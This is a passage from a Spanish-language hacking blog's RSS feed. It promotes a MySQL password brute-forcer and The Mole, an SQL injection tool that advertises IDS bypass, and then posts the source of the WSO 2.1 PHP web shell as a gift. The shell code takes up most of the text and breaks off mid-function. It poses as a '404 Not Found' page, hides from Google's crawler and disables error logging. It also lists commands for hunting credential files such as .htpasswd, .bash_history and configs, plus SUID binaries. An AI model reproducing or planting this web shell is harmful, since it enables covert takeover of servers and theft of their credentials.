MysqlPasswordAuditor es muy fácil de usar, con la simple diccionario, por fuerza bruta empieza a probar todas las contraseñas que estén en nuestro diccionario. Por defecto se incluye una lista de contraseñas de archivos pequeños, sin embargo pueden encontrar más diccionario con contraseñas &lt;a href="http://www.blackploit.com/2011/02/diccionarios-para-fuerza-bruta.html"&gt;&lt;b&gt;aquí&lt;/b&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;MysqlPasswordAuditor trabaja solo en Windows, funciona desde el XP hasta Windows 7.&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La instalación es bastante simple&lt;i&gt; next -&amp;gt; next... finish&lt;/i&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-OCUqmmnqWEU/TvO7u97UbqI/AAAAAAAAAb0/tL52gftZGYQ/s1600/mysqlpasswordauditor_installer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-OCUqmmnqWEU/TvO7u97UbqI/AAAAAAAAAb0/tL52gftZGYQ/s1600/mysqlpasswordauditor_installer.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Aquí un Screen:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-gES7BELDME0/TvO8Gxetd2I/AAAAAAAAAcA/vYA4hhjaQ_A/s1600/mysqlpasswordauditor_mainscreen_big.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="516" src="http://4.bp.blogspot.com/-gES7BELDME0/TvO8Gxetd2I/AAAAAAAAAcA/vYA4hhjaQ_A/s640/mysqlpasswordauditor_mainscreen_big.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="http://securityxploded.net/getfile.php?file=MysqlPasswordAuditor.zip"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Descarga &lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;MysqlPasswordAuditor 1.0&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Plataformas: &lt;/b&gt;Windows XP, 2003, Vista, Win7&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Web oficial: &lt;/b&gt;&lt;a href="http://securityxploded.com/mysql-password-auditor.php"&gt;http://securityxploded.com/&lt;/a&gt;&lt;/div&gt;
&lt;script type="text/javascript"&gt;
&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 336 x 280 */
google_ad_slot = "8058258251";
google_ad_width = 336;
google_ad_height = 280;
//--&gt;
&lt;/script&gt;
&lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
&lt;/script&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Salu2&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Zion3R&amp;nbsp;
   &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-136396153691128579?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/iqmckd-I0sd-7T3pUU8-RzHp7hc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/iqmckd-I0sd-7T3pUU8-RzHp7hc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/iqmckd-I0sd-7T3pUU8-RzHp7hc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/iqmckd-I0sd-7T3pUU8-RzHp7hc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/jQZqvI4wsc0" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-31T12:37:16.286-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-S7BsUXwY-KU/TvO6otFf4xI/AAAAAAAAAbo/BYNKeSmSoTc/s72-c/mysqlpasswordauditor_banner.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/12/mysqlpasswordauditor.html</feedburner:origLink></item><item><title>[The Mole] Herramienta de Inyección SQL/SQLi Automatizada</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/FqVINY1_QzM/mole-herramienta-de-inyeccion-sqlsqli.html</link><category>Herramientas</category><category>Hack T00LZ</category><category>SQLi</category><category>Web T00LZ</category><category>SQLi Tools</category><category>Programas Windows</category><category>Programas Linux</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Thu, 15 Dec 2011 15:02:49 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-6857398788721624515</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://3.bp.blogspot.com/-ZZsq-qhzhCw/TupvL7y2MoI/AAAAAAAAAaw/EwmMkIQpnkE/s1600/mole.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="198" src="http://3.bp.blogspot.com/-ZZsq-qhzhCw/TupvL7y2MoI/AAAAAAAAAaw/EwmMkIQpnkE/s200/mole.png" width="200" /&gt;&lt;/a&gt; Como regalo de navidad les traigo una de tantas herramientas para SQLi que existen, pero está me ha gustado bastante primero por que es de muy fácil uso y también por los métodos de petición que tiene.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;The Mole&lt;/b&gt; es una herramienta de inyección SQL automatizada que mediante una URL
vulnerable con su(s) respectivo(s) string(s) detectada y testeada en busca
de vulnerabilidad SQLi, ya sea por método UNION o por consulta Booleana.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Características:&lt;/b&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Soporta inyecciones a MySQL, SQL Server, PostgreSQL &amp;amp; Oracle.&lt;/li&gt;
&lt;li&gt;Soporta linea de comandos. Diferente comando producen diferentes respuestas.&lt;/li&gt;
&lt;li&gt;Auto-completación de los comandos, argumentos de comandos y los nombres de base de datos, tabla y las columnas.&lt;/li&gt;
&lt;li&gt;Soporte pata filtros de consulta, para bypass IPS/IDS.&lt;/li&gt;
&lt;li&gt;Explota inyecciones SQL a través de métodos GET y POST.&lt;/li&gt;
&lt;li&gt;Desarrollada en python3. &lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;/ul&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&amp;nbsp; &lt;a href="http://4.bp.blogspot.com/-38qwp7_qcF0/Tup45PVpxBI/AAAAAAAAAa4/i3KfAYClTHg/s1600/Mole_cons.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-38qwp7_qcF0/Tup45PVpxBI/AAAAAAAAAa4/i3KfAYClTHg/s1600/Mole_cons.png" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Vídeo demostrativo:&lt;/b&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/H3DjiIcDNZ4" width="640"&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;br /&gt;
&lt;b&gt;Web del proyecto:&lt;/b&gt; &lt;a href="http://themole.sourceforge.net/"&gt;http://themole.sourceforge.net/ &lt;/a&gt;&lt;br /&gt;
&lt;script type="text/javascript"&gt;
&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 336 x 280 */
google_ad_slot = "8058258251";
google_ad_width = 336;
google_ad_height = 280;
//--&gt;
&lt;/script&gt;
&lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
&lt;/script&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Descarga The Mole&lt;/b&gt;&lt;/span&gt; (2011-11-25):&amp;nbsp; &lt;br /&gt;
&lt;b&gt;Windows 32bit executable:&lt;/b&gt; &lt;a href="http://sourceforge.net/projects/themole/files/themole-0.2.6/themole-0.2.6-win32.zip/download"&gt;themole-0.2.6-win32.zip&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Tarball-gzipped format:&lt;/b&gt; &lt;a href="http://sourceforge.net/projects/themole/files/themole-0.2.6/themole-0.2.6-lin-src.tar.gz/download"&gt;themole-0.2.6-lin-src.tar.gz&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Zip format:&lt;/b&gt; &lt;a href="http://themole-0.2.6-win-src.zip/"&gt;http://themole-0.2.6-win-src.zip&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://themole.nasel.com.ar/?q=tutorial"&gt;&lt;b&gt;Tutorial Modo de uso de "The Mole"&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-6857398788721624515?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KUwikiJdSr_xhpvCMHneRfC1DPM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KUwikiJdSr_xhpvCMHneRfC1DPM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/KUwikiJdSr_xhpvCMHneRfC1DPM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KUwikiJdSr_xhpvCMHneRfC1DPM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/FqVINY1_QzM" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-15T20:02:49.387-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-ZZsq-qhzhCw/TupvL7y2MoI/AAAAAAAAAaw/EwmMkIQpnkE/s72-c/mole.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/12/mole-herramienta-de-inyeccion-sqlsqli.html</feedburner:origLink></item><item><title>[Shell PHP] Error 404 Privada</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/SA6TKtecncM/shell-php-error-404-privada.html</link><category>Herramientas</category><category>Hack T00LZ</category><category>PHP</category><category>s</category><category>Web T00LZ</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Mon, 12 Dec 2011 19:31:08 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7697940627406156189</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://s013.radikal.ru/i324/1109/9c/341397fe3eef.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-SUibbkHDD_M/TubBScXlTII/AAAAAAAAAao/m7Tk0LRRd3c/s1600/404-error-shell-private.gif" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Los chicos de &lt;b&gt;&lt;a href="http://www.subhashdasyam.com/2011/12/404-php-private-error-shell.html"&gt;www.subhashdasyam.com&lt;/a&gt;&lt;/b&gt; han hecho una Shell en PHP que la he encontrado bastante ingeniosa, útil y me ha gustado mucho. No necesita una ser detallada muy a fondo, ya que es como una Shell normal, solo que cuando uno intenta acceder aparece el clásico &lt;i&gt;&lt;b&gt;Error 404 - Not Found&lt;/b&gt;&lt;/i&gt;, pero tiene un&amp;nbsp; casilla &lt;i&gt;secreta&lt;/i&gt; donde puedes poner una contraseña para acceder.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La contraseña por defecto es &lt;b&gt;HACKED&lt;/b&gt; pero la pueden cambiar modificando la linea 4 en donde tienen que cambiar el hash MD5 que aparece por el hash MD5 de la contraseña que ustedes consideren.&lt;/div&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;$auth_pass = "36028fcd4abb97e9e4f47d929ddc9980";&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
Les dejo el código como un regalo de navidad ;)&lt;br /&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;pre class="brush:php"&gt;&amp;lt;?php 
/* WSO 2.1 (Web Shell by pgems.in) */ 
/*Subhashdasyam.com*/
$auth_pass = "36028fcd4abb97e9e4f47d929ddc9980"; 
$color = "#00ff00"; 
$default_action = 'FilesMan'; 
@define('SELF_PATH', __FILE__); 
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { 
    header('HTTP/1.0 404 Not Found'); 
    exit; 
} 
@session_start(); 
@error_reporting(0); 
@ini_set('error_log',NULL); 
@ini_set('log_errors',0); 
@ini_set('max_execution_time',0); 
@set_time_limit(0); 
@set_magic_quotes_runtime(0); 
@define('VERSION', '2.1'); 
if( get_magic_quotes_gpc() ) { 
    function stripslashes_array($array) { 
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); 
    } 
    $_POST = stripslashes_array($_POST); 
} 
function printLogin() { 
    ?&amp;gt; 
&amp;lt;h1&amp;gt;Not Found&amp;lt;/h1&amp;gt; 
&amp;lt;p&amp;gt;The requested URL was not found on this server.&amp;lt;/p&amp;gt; 
&amp;lt;hr&amp;gt; 
&amp;lt;address&amp;gt;Apache Server at &amp;lt;?=$_SERVER['HTTP_HOST']?&amp;gt; Port 80&amp;lt;/address&amp;gt; 
    &amp;lt;style&amp;gt; 
        input { margin:0;background-color:#fff;border:1px solid #fff; } 
    &amp;lt;/style&amp;gt; 
    &amp;lt;center&amp;gt; 
    &amp;lt;form method=post&amp;gt; 
    &amp;lt;input type=password name=pass&amp;gt; 
    &amp;lt;/form&amp;gt;&amp;lt;/center&amp;gt; 
    &amp;lt;?php 
    exit; 
} 
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) 
    if( empty( $auth_pass ) || 
        ( isset( $_POST['pass'] ) &amp;amp;&amp;amp; ( md5($_POST['pass']) == $auth_pass ) ) ) 
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; 
    else 
        printLogin(); 

if( strtolower( substr(PHP_OS,0,3) ) == "win" ) 
    $os = 'win'; 
else 
    $os = 'nix'; 
$safe_mode = @ini_get('safe_mode'); 
$disable_functions = @ini_get('disable_functions'); 
$home_cwd = @getcwd(); 
if( isset( $_POST['c'] ) ) 
    @chdir($_POST['c']); 
$cwd = @getcwd(); 
if( $os == 'win') { 
    $home_cwd = str_replace("\\", "/", $home_cwd); 
    $cwd = str_replace("\\", "/", $cwd); 
} 
if( $cwd[strlen($cwd)-1] != '/' ) 
    $cwd .= '/'; 
     
if($os == 'win') 
    $aliases = array( 
        "List Directory" =&amp;gt; "dir", 
        "Find index.php in current dir" =&amp;gt; "dir /s /w /b index.php", 
        "Find *config*.php in current dir" =&amp;gt; "dir /s /w /b *config*.php", 
        "Show active connections" =&amp;gt; "netstat -an", 
        "Show running services" =&amp;gt; "net start", 
        "User accounts" =&amp;gt; "net user", 
        "Show computers" =&amp;gt; "net view", 
        "ARP Table" =&amp;gt; "arp -a", 
        "IP Configuration" =&amp;gt; "ipconfig /all" 
    ); 
else 
    $aliases = array( 
          "List dir" =&amp;gt; "ls -la", 
        "list file attributes on a Linux second extended file system" =&amp;gt; "lsattr -va", 
          "show opened ports" =&amp;gt; "netstat -an | grep -i listen", 
        "Find" =&amp;gt; "", 
          "find all suid files" =&amp;gt; "find / -type f -perm -04000 -ls", 
          "find suid files in current dir" =&amp;gt; "find . -type f -perm -04000 -ls",
          "find all sgid files" =&amp;gt; "find / -type f -perm -02000 -ls", 
          "find sgid files in current dir" =&amp;gt; "find . -type f -perm -02000 -ls",
          "find config.inc.php files" =&amp;gt; "find / -type f -name config.inc.php", 
          "find config* files" =&amp;gt; "find / -type f -name \"config*\"", 
          "find config* files in current dir" =&amp;gt; "find . -type f -name \"config*\"", 
          "find all writable folders and files" =&amp;gt; "find / -perm -2 -ls", 
          "find all writable folders and files in current dir" =&amp;gt; "find . -perm -2 -ls", 
          "find all service.pwd files" =&amp;gt; "find / -type f -name service.pwd", 
          "find service.pwd files in current dir" =&amp;gt; "find . -type f -name service.pwd", 
          "find all .htpasswd files" =&amp;gt; "find / -type f -name .htpasswd", 
          "find .htpasswd files in current dir" =&amp;gt; "find . -type f -name .htpasswd", 
          "find all .bash_history files" =&amp;gt; "find / -type f -name .bash_history", 
          "find .bash_history files in current dir" =&amp;gt; "find . -type f -name .bash_history", 
          "find all .fetchmailrc files" =&amp;gt; "find / -type f -name .fetchmailrc", 
          "find .fetchmailrc files in current dir" =&amp;gt; "find . -type f -name .fetchmailrc", 
        "Locate" =&amp;gt; "", 
          "locate httpd.conf files" =&amp;gt; "locate httpd.conf", 
        "locate vhosts.conf files" =&amp;gt; "locate vhosts.conf", 
        "locate proftpd.conf files" =&amp;gt; "locate proftpd.conf", 
        "locate psybnc.conf files" =&amp;gt; "locate psybnc.conf", 
        "locate my.conf files" =&amp;gt; "locate my.conf", 
        "locate admin.php files" =&amp;gt;"locate admin.php", 
        "locate cfg.php files" =&amp;gt; "locate cfg.php", 
        "locate conf.php files" =&amp;gt; "locate conf.php", 
        "locate config.dat files" =&amp;gt; "locate config.dat", 
        "locate config.php files" =&amp;gt; "locate config.php", 
        "locate config.inc files" =&amp;gt; "locate config.inc", 
        "locate config.inc.php" =&amp;gt; "locate config.inc.php", 
        "locate config.default.php files" =&amp;gt; "locate config.default.php", 
        "locate config* files " =&amp;gt; "locate config", 
        "locate .conf files"=&amp;gt;"locate '.conf'", 
        "locate .pwd files" =&amp;gt; "locate '.pwd'", 
        "locate .sql files" =&amp;gt; "locate '.sql'", 
        "locate .htpasswd files" =&amp;gt; "locate '.htpasswd'", 
        "locate .bash_history files" =&amp;gt; "locate '.bash_history'", 
        "locate .mysql_history files" =&amp;gt; "locate '.mysql_history'", 
        "locate .fetchmailrc files" =&amp;gt; "locate '.fetchmailrc'", 
        "locate backup files" =&amp;gt; "locate backup", 
        "locate dump files" =&amp;gt; "locate dump", 
        "locate priv files" =&amp;gt; "locate priv"     
    ); 

function printHeader() { 
    if(empty($_POST['charset'])) 
        $_POST['charset'] = "UTF-8"; 
    global $color; 
    ?&amp;gt; 
&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;meta http-equiv='Content-Type' content='text/html; charset=&amp;lt;?=$_POST['charset']?&amp;gt;'&amp;gt;&amp;lt;title&amp;gt;&amp;lt;?=$_SERVER['HTTP_HOST']?&amp;gt;- 404 Not Found Shell V.&amp;lt;?=VERSION?&amp;gt;-SubhashDasyam.com&amp;lt;/title&amp;gt; 
&amp;lt;style&amp;gt; 
    body {background-color:#000;color:#fff;} 
    body,td,th    { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; } 
    span,h1,a    { color:&amp;lt;?=$color?&amp;gt; !important; } 
    span        { font-weight: bolder; } 
    h1            { border:1px solid &amp;lt;?=$color?&amp;gt;;padding: 2px 5px;font: 14pt Verdana;margin:0px; } 
    div.content    { padding: 5px;margin-left:5px;} 
    a            { text-decoration:none; } 
    a:hover        { background:#ff0000; } 
    .ml1        { border:1px solid #444;padding:5px;margin:0;overflow: auto; } 
    .bigarea    { width:100%;height:250px; } 
    input, textarea, select    { margin:0;color:#00ff00;background-color:#000;border:1px solid &amp;lt;?=$color?&amp;gt;; font: 9pt Monospace,"Courier New"; } 
    form        { margin:0px; } 
    #toolsTbl    { text-align:center; } 
    .toolsInp    { width: 80%; } 
    .main th    {text-align:left;} 
    .main tr:hover{background-color:#5e5e5e;} 
    .main td, th{vertical-align:middle;} 
    pre            {font-family:Courier,Monospace;} 
    #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} 
&amp;lt;/style&amp;gt; 
&amp;lt;script&amp;gt; 
    function set(a,c,p1,p2,p3,charset) { 
        if(a != null)document.mf.a.value=a; 
        if(c != null)document.mf.c.value=c; 
        if(p1 != null)document.mf.p1.value=p1; 
        if(p2 != null)document.mf.p2.value=p2; 
        if(p3 != null)document.mf.p3.value=p3; 
        if(charset != null)document.mf.charset.value=charset; 
    } 
    function g(a,c,p1,p2,p3,charset) { 
        set(a,c,p1,p2,p3,charset); 
        document.mf.submit(); 
    } 
    function a(a,c,p1,p2,p3,charset) { 
        set(a,c,p1,p2,p3,charset); 
        var params = "ajax=true"; 
        for(i=0;i&amp;lt;document.mf.elements.length;i++) 
            params += "&amp;amp;"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value); 
        sr('&amp;lt;?=$_SERVER['REQUEST_URI'];?&amp;gt;', params); 
    } 
    function sr(url, params) {     
        if (window.XMLHttpRequest) { 
            req = new XMLHttpRequest(); 
            req.onreadystatechange = processReqChange; 
            req.open("POST", url, true); 
            req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); 
            req.send(params); 
        }  
        else if (window.ActiveXObject) { 
            req = new ActiveXObject("Microsoft.XMLHTTP"); 
            if (req) { 
                req.onreadystatechange = processReqChange; 
                req.open("POST", url, true); 
                req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); 
                req.send(params); 
            } 
        } 
    } 
    function processReqChange() { 
        if( (req.readyState == 4) ) 
            if(req.status == 200) { 
                //alert(req.responseText); 
                var reg = new RegExp("(\\d+)([\\S\\s]*)", "m"); 
                var arr=reg.exec(req.responseText); 
                eval(arr[2].substr(0, arr[1])); 
            }  
            else alert("Request error!"); 
    } 
&amp;lt;/script&amp;gt; 
&amp;lt;head&amp;gt;&amp;lt;body&amp;gt;&amp;lt;div style="position:absolute;width:100%;top:0;left:0;"&amp;gt; 
&amp;lt;form method=post name=mf style='display:none;'&amp;gt; 
&amp;lt;input type=hidden name=a value='&amp;lt;?=isset($_POST['a'])?$_POST['a']:''?&amp;gt;'&amp;gt; 
&amp;lt;input type=hidden name=c value='&amp;lt;?=htmlspecialchars($GLOBALS['cwd'])?&amp;gt;'&amp;gt; 
&amp;lt;input type=hidden name=p1 value='&amp;lt;?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?&amp;gt;'&amp;gt; 
&amp;lt;input type=hidden name=p2 value='&amp;lt;?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?&amp;gt;'&amp;gt; 
&amp;lt;input type=hidden name=p3 value='&amp;lt;?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?&amp;gt;'&amp;gt; 
&amp;lt;input type=hidden name=charset value='&amp;lt;?=isset($_POST['charset'])?$_POST['charset']:''?&amp;gt;'&amp;gt; 
&amp;lt;/form&amp;gt; 
&amp;lt;?php 
    $freeSpace = @diskfreespace($GLOBALS['cwd']); 
    $totalSpace = @disk_total_space($GLOBALS['cwd']); 
    $totalSpace = $totalSpace?$totalSpace:1; 
    $release = @php_uname('r'); 
    $kernel = @php_uname('s'); 
    $millink='http://milw0rm.com/search.php?dong='; 
    if( strpos('Linux', $kernel) !== false ) 
        $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); 
    else 
        $millink .= urlencode( $kernel . ' ' . substr($release,0,3) ); 
    if(!function_exists('posix_getegid')) { 
        $user = @get_current_user(); 
        $uid = @getmyuid(); 
        $gid = @getmygid(); 
        $group = "?"; 
    } else { 
        $uid = @posix_getpwuid(@posix_geteuid()); 
        $gid = @posix_getgrgid(@posix_getegid()); 
        $user = $uid['name']; 
        $uid = $uid['uid']; 
        $group = $gid['name']; 
        $gid = $gid['gid']; 
    } 
    $cwd_links = ''; 
    $path = explode("/", $GLOBALS['cwd']); 
    $n=count($path); 
    for($i=0;$i&amp;lt;$n-1;$i++) { 
        $cwd_links .= "&amp;lt;a href='#' onclick='g(\"FilesMan\",\""; 
        for($j=0;$j&amp;lt;=$i;$j++) 
            $cwd_links .= $path[$j].'/'; 
        $cwd_links .= "\")'&amp;gt;".$path[$i]."/&amp;lt;/a&amp;gt;"; 
    } 
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); 
    $opt_charsets = ''; 
    foreach($charsets as $item) 
        $opt_charsets .= '&amp;lt;option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'&amp;gt;'.$item.'&amp;lt;/option&amp;gt;'; 
    $m = array('Sec. Info'=&amp;gt;'SecInfo','Files'=&amp;gt;'FilesMan','Console'=&amp;gt;'Console','Sql'=&amp;gt;'Sql','Php'=&amp;gt;'Php','Safe mode'=&amp;gt;'SafeMode','String tools'=&amp;gt;'StringTools','Bruteforce'=&amp;gt;'Bruteforce','Network'=&amp;gt;'Network'); 
    if(!empty($GLOBALS['auth_pass'])) 
    $m['Logout'] = 'Logout'; 
    $m['Self remove'] = 'SelfRemove'; 
    $menu = ''; 
    foreach($m as $k =&amp;gt; $v) 
        $menu .= '&amp;lt;th width="'.(int)(100/count($m)).'%"&amp;gt;[ &amp;lt;a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')"&amp;gt;'.$k.'&amp;lt;/a&amp;gt; ]&amp;lt;/th&amp;gt;'; 
    $drives = ""; 
    if ($GLOBALS['os'] == 'win') { 
        foreach( range('a','z') as $drive ) 
        if (is_dir($drive.':\\')) 
            $drives .= '&amp;lt;a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')"&amp;gt;[ '.$drive.' ]&amp;lt;/a&amp;gt; '; 
    } 
    echo '&amp;lt;table class=info cellpadding=3 cellspacing=0 width=100%&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td width=1&amp;gt;&amp;lt;span&amp;gt;Uname&amp;lt;br&amp;gt;User&amp;lt;br&amp;gt;Php&amp;lt;br&amp;gt;Hdd&amp;lt;br&amp;gt;Cwd'.($GLOBALS['os'] == 'win'?'&amp;lt;br&amp;gt;Drives':'').'&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;'. 
